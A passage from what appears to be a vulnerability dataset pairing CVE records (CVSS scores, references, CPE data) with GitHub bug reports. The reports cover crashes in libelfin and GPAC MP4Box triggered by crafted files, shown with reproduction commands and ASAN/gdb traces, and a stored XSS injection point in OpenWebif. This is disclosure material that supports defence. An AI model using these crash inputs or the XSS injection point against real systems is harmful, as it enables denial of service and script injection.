total heap usage: 132 allocs, 60 frees, 89,399 bytes allocated ==4796== ==4796== LEAK SUMMARY: ==4796== definitely lost: 0 bytes in 0 blocks ==4796== indirectly lost: 0 bytes in 0 blocks ==4796== possibly lost: 0 bytes in 0 blocks ==4796== still reachable: 81,475 bytes in 72 blocks ==4796== suppressed: 0 bytes in 0 blocks ==4796== Rerun with --leak-check=full to see details of leaked memory ==4796== ==4796== For counts of detected and suppressed errors, rerun with: -v ==4796== ERROR SUMMARY: 1 errors from 1 contexts (suppressed: 0 from 0) Segmentation fault (core dumped) ``` I use **AddressSanitizer** to build ffjpeg and running it with the following command: ``` /path-to-libelfin/examples/dump-lines dump_line_segv ``` This is the ASAN information (absolute path information omitted): ``` /path-to-libelfin-address/examples/dump-lines dump_line_segv ASAN:SIGSEGV ================================================================= ==4850==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x00000043b335 bp 0x7fff42876e40 sp 0x7fff428769e0 T0) #0 0x43b334 in dwarf::line_table::line_table(std::shared_ptr<dwarf::section> const&, unsigned long, unsigned int, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&) /path-to-libelfin-address/dwarf/line.cc:104 #1 0x40f67b in dwarf::compilation_unit::get_line_table() const /path-to-libelfin-address/dwarf/dwarf.cc:304 #2 0x403356 in main /path-to-libelfin-address/examples/dump-lines.cc:41 #3 0x7f82f990682f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #4 0x403888 in _start (/path-to-libelfin-address/examples/dump-lines+0x403888) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /path-to-libelfin-address/dwarf/line.cc:104 dwarf::line_table::line_table(std::shared_ptr<dwarf::section> const&, unsigned long, unsigned int, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&) ==4850==ABORTING ``` An attacker can exploit this vulnerability by submitting a malicious elf file that exploits this bug which will result in a Denial of Service (DoS).
SEGV in function line_table::line_table at dwarf/line.cc:104
https://api.github.com/repos/aclements/libelfin/issues/46/comments
2
2020-08-15T13:07:30Z
2023-02-14T10:51:28Z
https://github.com/aclements/libelfin/issues/46
679,567,438
46
2,270
CVE-2020-24826
2021-08-04T15:15:08.753
A vulnerability in the elf::section::as_strtab function of Libelfin v0.3 allows attackers to cause a denial of service (DOS) through a segmentation fault via a crafted ELF file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/aclements/libelfin/issues/49" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/xiaoxiongwang/function_bugs/tree/master/libelfin#segv-in-function-elfsectionas_strtab-at-elfelfcc284" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/aclements/libelfin/issues/49" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/xiaoxiongwang/function_bugs/tree/master/libelfin#segv-in-function-elfsectionas_strtab-at-elfelfcc284" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libelfin_project:libelfin:0.3:*:*:*:*:*:*:*", "matchCriteriaId": "B18704CF-84AF-4699-BA52-8974DFE68BC7", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "74" ]
74
https://github.com/aclements/libelfin/issues/49
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "aclements", "libelfin" ]
Tested in Ubuntu 16.04, 64bit. The tested program is the example program dump-syms. The testcase is [dump_syms_segv](https://github.com/xiaoxiongwang/function_bugs/blob/master/libelfin/dump_syms_segv). I use the following command: ``` /path-to-libelfin/examples/dump-syms dump_syms_segv ``` and get: ``` Segmentation fault (core dumped) ``` I use **valgrind** to analysis the bug and get the below information (absolute path information omitted): ``` valgrind /path-to-libelfin/examples/dump-syms dump_syms_segv ==13575== Memcheck, a memory error detector ==13575== Copyright (C) 2002-2015, and GNU GPL'd, by Julian Seward et al. ==13575== Using Valgrind-3.11.0 and LibVEX; rerun with -h for copyright info ==13575== Command: /path-to-libelfin/examples/dump-syms dump_syms_segv ==13575== ==13575== Invalid read of size 4 ==13575== at 0x40A8A3: elf::section::as_strtab() const (elf.cc:284) ==13575== by 0x40BD91: elf::section::as_symtab() const (elf.cc:295) ==13575== by 0x401FD8: main (dump-syms.cc:32) ==13575== Address 0x14 is not stack'd, malloc'd or (recently) free'd ==13575== ==13575== ==13575== Process terminating with default action of signal 11 (SIGSEGV) ==13575== Access not within mapped region at address 0x14 ==13575== at 0x40A8A3: elf::section::as_strtab() const (elf.cc:284) ==13575== by 0x40BD91: elf::section::as_symtab() const (elf.cc:295) ==13575== by 0x401FD8: main (dump-syms.cc:32) ==13575== If you believe this happened as a result of a stack ==13575== overflow in your program's main thread (unlikely but ==13575== possible), you can try to increase the size of the ==13575== main thread stack using the --main-stacksize= flag. ==13575== The main thread stack size used in this run was 8388608. Symbol table '.dynsym': Num: Value Size Type Binding Index Name ==13575== ==13575== HEAP SUMMARY: ==13575== in use at exit: 79,384 bytes in 50 blocks ==13575== total heap usage: 62 allocs, 12 frees, 84,776 bytes allocated ==13575== ==13575== LEAK SUMMARY: ==13575== definitely lost: 0 bytes in 0 blocks ==13575== indirectly lost: 0 bytes in 0 blocks ==13575== possibly lost: 0 bytes in 0 blocks ==13575== still reachable: 79,384 bytes in 50 blocks ==13575== suppressed: 0 bytes in 0 blocks ==13575== Rerun with --leak-check=full to see details of leaked memory ==13575== ==13575== For counts of detected and suppressed errors, rerun with: -v ==13575== ERROR SUMMARY: 1 errors from 1 contexts (suppressed: 0 from 0) Segmentation fault (core dumped) ``` I use **AddressSanitizer** to build ffjpeg and running it with the following command: ``` /path-to-libelfin/examples/dump-syms dump_syms_segv ``` This is the ASAN information (absolute path information omitted): ``` /path-to-libelfin-address/examples/dump-syms dump_syms_segv ASAN:SIGSEGV ================================================================= ==13619==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000014 (pc 0x000000409050 bp 0x7ffdc34bbe50 sp 0x7ffdc34bbe10 T0) #0 0x40904f in elf::section::as_strtab() const /path-to-libelfin-address/elf/elf.cc:284 #1 0x4099f5 in elf::section::as_symtab() const /path-to-libelfin-address/elf/elf.cc:295 #2 0x4023fa in main /path-to-libelfin-address/examples/dump-syms.cc:32 #3 0x7fae884aa82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #4 0x403728 in _start (/path-to-libelfin-address/examples/dump-syms+0x403728) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /path-to-libelfin-address/elf/elf.cc:284 elf::section::as_strtab() const ==13619==ABORTING ``` An attacker can exploit this vulnerability by submitting a malicious elf file that exploits this bug which will result in a Denial of Service (DoS).
SEGV in function elf::section::as_strtab at elf/elf.cc:284
https://api.github.com/repos/aclements/libelfin/issues/49/comments
1
2020-08-15T13:15:40Z
2021-08-06T06:48:07Z
https://github.com/aclements/libelfin/issues/49
679,573,074
49
2,271
CVE-2021-38113
2021-08-04T19:15:08.637
In addBouquet in js/bqe.js in OpenWebif (aka e2openplugin-OpenWebif) through 1.4.7, inserting JavaScript into the Add Bouquet feature of the Bouquet Editor (i.e., bouqueteditor/api/addbouquet?name=) leads to Stored XSS.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/E2OpenPlugins/e2openplugin-OpenWebif/issues/1387" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/E2OpenPlugins/e2openplugin-OpenWebif/issues/1387" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:openwebif_project:openwebif:*:*:*:*:*:enigma2:*:*", "matchCriteriaId": "F8BA84A1-D4AD-4CE0-BEB8-0B0FAD983F9F", "versionEndExcluding": null, "versionEndIncluding": "1.4.7", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/E2OpenPlugins/e2openplugin-OpenWebif/issues/1387
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "E2OpenPlugins", "e2openplugin-OpenWebif" ]
null
Stored XSS bug
https://api.github.com/repos/E2OpenPlugins/e2openplugin-OpenWebif/issues/1387/comments
2
2021-08-04T12:12:19Z
2024-01-19T20:26:54Z
https://github.com/E2OpenPlugins/e2openplugin-OpenWebif/issues/1387
960,348,296
1,387
2,272
CVE-2020-22352
2021-08-04T21:15:08.033
The gf_dash_segmenter_probe_input function in GPAC v0.8 allows attackers to cause a denial of service (NULL pointer dereference) via a crafted file in the MP4Box command.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1423" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1423" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:0.8.0:*:*:*:*:*:*:*", "matchCriteriaId": "93EEFCFD-7417-40E6-84BF-4EA630F2A8A1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/gpac/gpac/issues/1423
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [x] I looked for a similar issue and couldn't find any. - [x] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/ System info: Ubuntu 18.04.6 LTS, X64, gcc version 7.4.0, gpac (latest master 4a7a63) Compile Command: ```asm $ CC="gcc -fsanitize=address -g" CXX="g++ -fsanitize=address -g" ./configure --static-mp4box $ make ``` Run Command: ```asm ./MP4Box -dash 1000 crash_3 ``` ASAN info: ```asm ================================================================= ==13768==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000004 (pc 0x562656a3daf0 bp 0x000000000001 sp 0x7ffee325fef0 T0) ==13768==The signal is caused by a READ memory access. ==13768==Hint: address points to the zero page. #0 0x562656a3daef in gf_dash_segmenter_probe_input media_tools/dash_segmenter.c:5264 #1 0x562656a6350a in gf_dasher_add_input media_tools/dash_segmenter.c:6669 #2 0x56265663ea6f in mp4boxMain /home/dr3dd/fuzzing/gpac/applications/mp4box/main.c:4704 #3 0x7fab411e9b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #4 0x56265662d7a9 in _start (/home/dr3dd/fuzzing/gpac/bin/gcc/MP4Box+0x1657a9) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV media_tools/dash_segmenter.c:5264 in gf_dash_segmenter_probe_input ==13768==ABORTING ``` gdb info: ```asm (gdb) r -dash 1000 ~/gpac_poc/crash_3 Starting program: /home/dr3dd/fuzzing/gpac/bin/gcc/MP4Box -dash 1000 ~/gpac_poc/crash_2 [Thread debugging using libthread_db enabled] Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". Program received signal SIGSEGV, Segmentation fault. 0x0000555555bf408c in gf_dash_segmenter_probe_input (io_dash_inputs=io_dash_inputs@entry=0x5555562c4978, nb_dash_inputs=nb_dash_inputs@entry=0x5555562c4980, idx=idx@entry=0) at media_tools/dash_segmenter.c:5264 5264 if (esd && (esd->decoderConfig->objectTypeIndication == GPAC_OTI_VIDEO_HEVC || esd->decoderConfig->objectTypeIndication == GPAC_OTI_VIDEO_LHVC)) { (gdb) bt #0 0x0000555555bf408c in gf_dash_segmenter_probe_input (io_dash_inputs=io_dash_inputs@entry=0x5555562c4978, nb_dash_inputs=nb_dash_inputs@entry=0x5555562c4980, idx=idx@entry=0) at media_tools/dash_segmenter.c:5264 #1 0x0000555555c2dabb in gf_dasher_add_input (dasher=0x5555562c4970, input=<optimized out>) at media_tools/dash_segmenter.c:6669 #2 0x00005555555c88f5 in mp4boxMain (argc=<optimized out>, argv=<optimized out>) at main.c:4704 #3 0x00007ffff722bb97 in __libc_start_main () from /lib/x86_64-linux-gnu/libc.so.6 #4 0x00005555555a3e0a in _start () at main.c:5985 (gdb) ``` Here is crash file: [crash_3.zip](https://github.com/gpac/gpac/files/4272293/crash_3.zip) Thanks dr3dd
AddressSanitizer: NULL pointer dereference in media_tools/dash_segmenter.c:5264 in gf_dash_segmenter_probe_input
https://api.github.com/repos/gpac/gpac/issues/1423/comments
1
2020-03-01T19:19:26Z
2020-06-11T17:19:33Z
https://github.com/gpac/gpac/issues/1423
573,599,771
1,423
2,273
CVE-2020-24829
2021-08-04T21:15:08.077
An issue was discovered in GPAC v0.8.0, as demonstrated by MP4Box. It contains a heap-based buffer overflow in gf_m2ts_section_complete in media_tools/mpegts.c that can cause a denial of service (DOS) via a crafted MP4 file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1422" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1422" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:0.8.0:*:*:*:*:*:*:*", "matchCriteriaId": "93EEFCFD-7417-40E6-84BF-4EA630F2A8A1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/gpac/gpac/issues/1422
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [x] I looked for a similar issue and couldn't find any. - [x] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/ System info: Ubuntu 18.04.6 LTS, X64, gcc version 7.4.0, gpac (latest master 4a7a63) Compile Command: ```asm $ CC="gcc -fsanitize=address -g" CXX="g++ -fsanitize=address -g" ./configure --static-mp4box $ make ``` Run Command: ```asm ./MP4Box -dash 1000 crash_2 ``` ASAN info: ```asm ================================================================= ==12759==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6020000000d3 at pc 0x55feb146edf3 bp 0x7fff627852e0 sp 0x7fff627852d0 READ of size 1 at 0x6020000000d3 thread T0 #0 0x55feb146edf2 in gf_m2ts_section_complete media_tools/mpegts.c:1471 #1 0x55feb146f3ab in gf_m2ts_gather_section media_tools/mpegts.c:1740 #2 0x55feb147524c in gf_m2ts_process_packet media_tools/mpegts.c:3440 #3 0x55feb147524c in gf_m2ts_process_data media_tools/mpegts.c:3507 #4 0x55feb1484886 in gf_m2ts_probe_file media_tools/mpegts.c:4641 #5 0x55feb13ac7f0 in gf_dash_segmenter_probe_input media_tools/dash_segmenter.c:5505 #6 0x55feb13d350a in gf_dasher_add_input media_tools/dash_segmenter.c:6669 #7 0x55feb0faea6f in mp4boxMain /home/dr3dd/fuzzing/gpac/applications/mp4box/main.c:4704 #8 0x7f1e4bd95b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #9 0x55feb0f9d7a9 in _start (/home/dr3dd/fuzzing/gpac/bin/gcc/MP4Box+0x1657a9) 0x6020000000d3 is located 0 bytes to the right of 3-byte region [0x6020000000d0,0x6020000000d3) allocated by thread T0 here: #0 0x7f1e4ca1df40 in realloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xdef40) #1 0x55feb146f309 in gf_m2ts_gather_section media_tools/mpegts.c:1730 SUMMARY: AddressSanitizer: heap-buffer-overflow media_tools/mpegts.c:1471 in gf_m2ts_section_complete Shadow bytes around the buggy address: 0x0c047fff7fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c047fff8000: fa fa 02 fa fa fa 00 00 fa fa 00 00 fa fa 00 00 =>0x0c047fff8010: fa fa 00 00 fa fa 00 00 fa fa[03]fa fa fa fa fa 0x0c047fff8020: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==12759==ABORTING ``` gdb Info: ```asm Program received signal SIGSEGV, Segmentation fault. 0x0000555555d45a2d in gf_m2ts_process_pmt (ts=<optimized out>, pmt=<optimized out>, sections=<optimized out>, table_id=<optimized out>, ex_table_id=<optimized out>, version_number=<optimized out>, last_section_number=<optimized out>, status=<optimized out>) at media_tools/mpegts.c:2535 2535 gf_list_add(pmt->program->streams, es); (gdb) bt #0 0x0000555555d45a2d in gf_m2ts_process_pmt (ts=<optimized out>, pmt=<optimized out>, sections=<optimized out>, table_id=<optimized out>, ex_table_id=<optimized out>, version_number=<optimized out>, last_section_number=<optimized out>, status=<optimized out>) at media_tools/mpegts.c:2535 #1 0x0000555555d35506 in gf_m2ts_section_complete (ts=ts@entry=0x5555562c5a40, sec=sec@entry=0x5555562d7440, ses=ses@entry=0x5555562d7390) at media_tools/mpegts.c:1610 #2 0x0000555555d3638a in gf_m2ts_gather_section (ts=ts@entry=0x5555562c5a40, sec=0x5555562d7440, ses=ses@entry=0x5555562d7390, data=0x7ffffffa6821 "", data@entry=0x7ffffffa681a "", data_size=<optimized out>, hdr=<optimized out>, hdr=<optimized out>) at media_tools/mpegts.c:1740 #3 0x0000555555d3f3be in gf_m2ts_process_packet (data=0x7ffffffa681a "", ts=0x5555562c5a40) at media_tools/mpegts.c:3446 #4 gf_m2ts_process_data (ts=ts@entry=0x5555562c5a40, data=data@entry=0x7ffffffa6700 "", data_size=<optimized out>) at media_tools/mpegts.c:3507 #5 0x0000555555d54ca1 in gf_m2ts_probe_file (fileName=<optimized out>) at media_tools/mpegts.c:4641 #6 0x0000555555bf0844 in gf_dash_segmenter_probe_input (io_dash_inputs=io_dash_inputs@entry=0x5555562c4978, nb_dash_inputs=nb_dash_inputs@entry=0x5555562c4980, idx=idx@entry=0) at media_tools/dash_segmenter.c:5505 #7 0x0000555555c2dabb in gf_dasher_add_input (dasher=0x5555562c4970, input=<optimized out>) at media_tools/dash_segmenter.c:6669 #8 0x00005555555c88f5 in mp4boxMain (argc=<optimized out>, argv=<optimized out>) at main.c:4704 #9 0x00007ffff722bb97 in __libc_start_main () from /lib/x86_64-linux-gnu/libc.so.6 #10 0x00005555555a3e0a in _start () at main.c:5985 ``` here is crash file: [crash_2.zip](https://github.com/gpac/gpac/files/4272267/crash_2.zip) Thanks dr3dd
AddressSanitizer: heap-buffer-overflow media_tools/mpegts.c:1471 in gf_m2ts_section_complete
https://api.github.com/repos/gpac/gpac/issues/1422/comments
0
2020-03-01T18:58:01Z
2020-03-06T17:21:35Z
https://github.com/gpac/gpac/issues/1422
573,596,583
1,422
2,274